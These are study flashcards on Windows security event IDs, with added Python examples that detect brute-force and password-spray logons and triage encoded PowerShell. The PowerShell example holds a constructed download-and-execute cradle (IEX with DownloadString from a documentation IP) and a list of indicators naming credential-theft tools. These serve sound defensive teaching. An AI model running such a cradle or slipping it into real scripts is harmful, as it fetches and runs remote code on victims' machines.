Windows Security Event IDs Flashcards

1
Q

4624

A

An account was successfully logged on. Use it as the baseline of normal activity: who logs in, from where, at what times, and how (Logon Type 2 interactive, 3 network, 10 RemoteInteractive/RDP), so that deviations from the pattern stand out.

2
Q

4625

A

An account failed to log on. Repeated 4625s for one account or from one source address in a short window indicate brute forcing or password spraying. Sub Status separates a wrong password (0xC000006A) from a nonexistent account (0xC0000064), and a 4624 from the same source right after a burst of failures means the guessing worked.

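A worked detection over cards 1 and 2 (4624 and 4625), added here as an example and not part of the original flashcard set. The events are constructed samples in a simplified dict form using the XML EventData field names (TargetUserName, IpAddress, LogonType, SubStatus); a real pipeline would fill them from Get-WinEvent output or a SIEM export. The threshold of five failures in two minutes and the severity labels are illustrative choices.

```python
"""Credential-guessing detection over 4625 / 4624 events.

Added example for this flashcard set, not code from the page. All events below
are constructed; thresholds are illustrative.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# 4625 Sub Status values worth separating during triage (real codes)
BAD_PASSWORD = "0xC000006A"   # account exists, password wrong
UNKNOWN_USER = "0xC0000064"   # account does not exist (typical of sprays/enumeration)


def ev(event_id, t, user, ip, logon_type, sub_status=None):
    """Build one constructed sample event (all on 2024-05-01)."""
    return {"EventID": event_id, "TimeCreated": f"2024-05-01T{t}", "TargetUserName": user,
            "IpAddress": ip, "LogonType": logon_type, "SubStatus": sub_status}


SAMPLE_EVENTS = [
    # six failures for one account from one host, then a success: brute force that worked
    ev(4625, "08:00:01", "jdoe", "10.0.0.5", 3, BAD_PASSWORD),
    ev(4625, "08:00:10", "jdoe", "10.0.0.5", 3, BAD_PASSWORD),
    ev(4625, "08:00:20", "jdoe", "10.0.0.5", 3, BAD_PASSWORD),
    ev(4625, "08:00:30", "jdoe", "10.0.0.5", 3, BAD_PASSWORD),
    ev(4625, "08:00:40", "jdoe", "10.0.0.5", 3, BAD_PASSWORD),
    ev(4625, "08:00:50", "jdoe", "10.0.0.5", 3, BAD_PASSWORD),
    ev(4624, "08:01:05", "jdoe", "10.0.0.5", 3),
    # two typos and a normal interactive logon: stays below threshold, no alert
    ev(4625, "08:00:05", "asmith", "10.0.0.9", 2, BAD_PASSWORD),
    ev(4625, "08:00:15", "asmith", "10.0.0.9", 2, BAD_PASSWORD),
    ev(4624, "08:00:30", "asmith", "10.0.0.9", 2),
    # one external source trying many accounts: password spray (203.0.113.0/24 is TEST-NET-3)
    ev(4625, "08:02:00", "admin", "203.0.113.7", 3, BAD_PASSWORD),
    ev(4625, "08:02:01", "backup", "203.0.113.7", 3, UNKNOWN_USER),
    ev(4625, "08:02:02", "svc_sql", "203.0.113.7", 3, BAD_PASSWORD),
    ev(4625, "08:02:03", "helpdesk", "203.0.113.7", 3, UNKNOWN_USER),
    ev(4625, "08:02:04", "root", "203.0.113.7", 3, UNKNOWN_USER),
]


def detect_credential_guessing(events, threshold=5, window=timedelta(minutes=2)):
    """Return alerts in time order.

    Medium alert when one source IP produces `threshold` 4625s inside `window`
    (labelled a spray if several accounts were targeted, brute force otherwise).
    High alert when a flagged source then gets a network or RDP 4624.
    """
    events = sorted(({**e, "ts": datetime.fromisoformat(e["TimeCreated"])} for e in events),
                    key=lambda e: e["ts"])
    recent = defaultdict(deque)   # ip -> (ts, user, sub_status) of 4625s inside the window
    flagged = set()
    alerts = []
    for e in events:
        ip = e["IpAddress"]
        if e["EventID"] == 4625:
            q = recent[ip]
            q.append((e["ts"], e["TargetUserName"], e["SubStatus"]))
            while q and e["ts"] - q[0][0] > window:   # slide the window forward
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                users = sorted({u for _, u, _ in q})
                alerts.append({
                    "severity": "medium",
                    "type": "password spray" if len(users) > 1 else "brute force",
                    "ip": ip, "count": len(q), "users": users,
                    "unknown_user_failures": sum(1 for _, _, s in q if s == UNKNOWN_USER),
                })
        elif e["EventID"] == 4624 and ip in flagged and e["LogonType"] in (3, 10):
            # a network (3) or RDP (10) success from a source already flagged: the guessing worked
            alerts.append({"severity": "high", "type": "success after failures", "ip": ip,
                           "user": e["TargetUserName"], "logon_type": e["LogonType"]})
    return alerts


if __name__ == "__main__":
    for a in detect_credential_guessing(SAMPLE_EVENTS):
        print(a)
```

The per-source deque keeps only failures inside the window, so a slow drip of typos never accumulates into an alert, while the `flagged` set makes the 4624 correlation possible: the success is only interesting because of the failures that preceded it from the same address.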
3
Q

4688

A

A new process has been created. Primary source for spotting malicious binaries and living-off-the-land tools (powershell.exe, cmd.exe, mshta.exe) and for parent/child anomalies via Creator Process Name (an Office application spawning a shell, for example). The command line is only recorded when the audit policy "Include command line in process creation events" is enabled; without it you see the image path but not the arguments.

4
Q

7045

A

A service was installed in the system (System log, source Service Control Manager; the Security log equivalent is 4697). Classic persistence, MITRE ATT&CK T1543.003 (Create or Modify System Process: Windows Service). Review Service Name, Service File Name (cmd.exe, powershell.exe, or binaries under user-writable paths) and the account that installed it.

5
Q

4104

A

PowerShell Script Block Logging (Microsoft-Windows-PowerShell/Operational log). Records the script text as PowerShell actually executed it, after encoding and obfuscation are resolved, so it shows what a PowerShell command really did when 4688 only shows an encoded blob. Off by default; enable via Group Policy "Turn on PowerShell Script Block Logging". PowerShell 5 and later also emits Warning-level 4104 entries on its own for some suspicious content.

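A worked example tying cards 3 and 5 together (4688 command lines and 4104 script blocks), added here and not part of the original flashcard set. The events are constructed dicts using the XML EventData field names (NewProcessName, ParentProcessName, CommandLine for 4688; ScriptBlockText for 4104). The indicator list, the Office-parent rule and the payload are illustrative; 203.0.113.10 is a documentation address, not a real host.

```python
"""From 4688 command line to 4104 script block: reading encoded PowerShell.

Added example for this flashcard set, not code from the page. Events and the
indicator list are constructed and illustrative.
"""
import base64
import re

# Illustrative indicators; real rule sets are far larger and tuned per environment.
SUSPICIOUS_PATTERNS = [
    r"FromBase64String",
    r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest",
    r"\bIEX\b|Invoke-Expression",
    r"-nop\b|-NoProfile",
    r"-w(indowstyle)?\s+hidden",
    r"Invoke-Mimikatz|Invoke-Shellcode",
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# -EncodedCommand and the abbreviations PowerShell accepts for it
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

# Constructed payload: what an attacker would hide behind -enc (TEST-NET-3 address).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_4688 = [
    {"ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -nop -w hidden -c "IEX (Get-Content C:\\Users\\Public\\x.txt)"'},
]
SAMPLE_4104 = [
    {"ScriptBlockText": PAYLOAD},  # what script block logging records for the first 4688
    {"ScriptBlockText": "Get-Service | Where-Object Status -eq 'Running'"},  # benign admin work
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE, as PowerShell expects),
    or None when the command line carries none or the blob is not valid base64."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def match_indicators(text):
    """Indicator patterns that occur anywhere in `text`, in list order."""
    return [p for p in SUSPICIOUS_PATTERNS if re.search(p, text, re.I)]


def triage_4688(event):
    """Findings for one 4688 event plus the decoded payload, if any.
    The base64 blob is stripped before scanning so random letter runs inside it
    cannot trigger indicators; the decoded text is scanned instead."""
    findings = []
    child = event["NewProcessName"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentProcessName"].rsplit("\\", 1)[-1].lower()
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        findings.append(f"office parent {parent} spawned {child}")
    decoded = decode_encoded_command(event["CommandLine"])
    text = ENC_RE.sub("", event["CommandLine"])
    if decoded is not None:
        findings.append("encoded command")
        text += "\n" + decoded
    findings.extend(f"pattern: {p}" for p in match_indicators(text))
    return findings, decoded


def triage_4104(event):
    """4104 already holds the de-obfuscated script text, so scan it directly."""
    return [f"pattern: {p}" for p in match_indicators(event["ScriptBlockText"])]


if __name__ == "__main__":
    for e in SAMPLE_4688:
        print("4688:", triage_4688(e))
    for e in SAMPLE_4104:
        print("4104:", triage_4104(e))
```

The point of the pairing: without the -enc decoding step (or without 4104 at all), the first 4688 looks like nothing more than powershell.exe with some switches, while the 4104 record for the same execution shows the download cradle in plain text. Decoding in the detection pipeline recovers that visibility from 4688 alone, but only 4104 catches payloads that are built at runtime rather than passed on the command line.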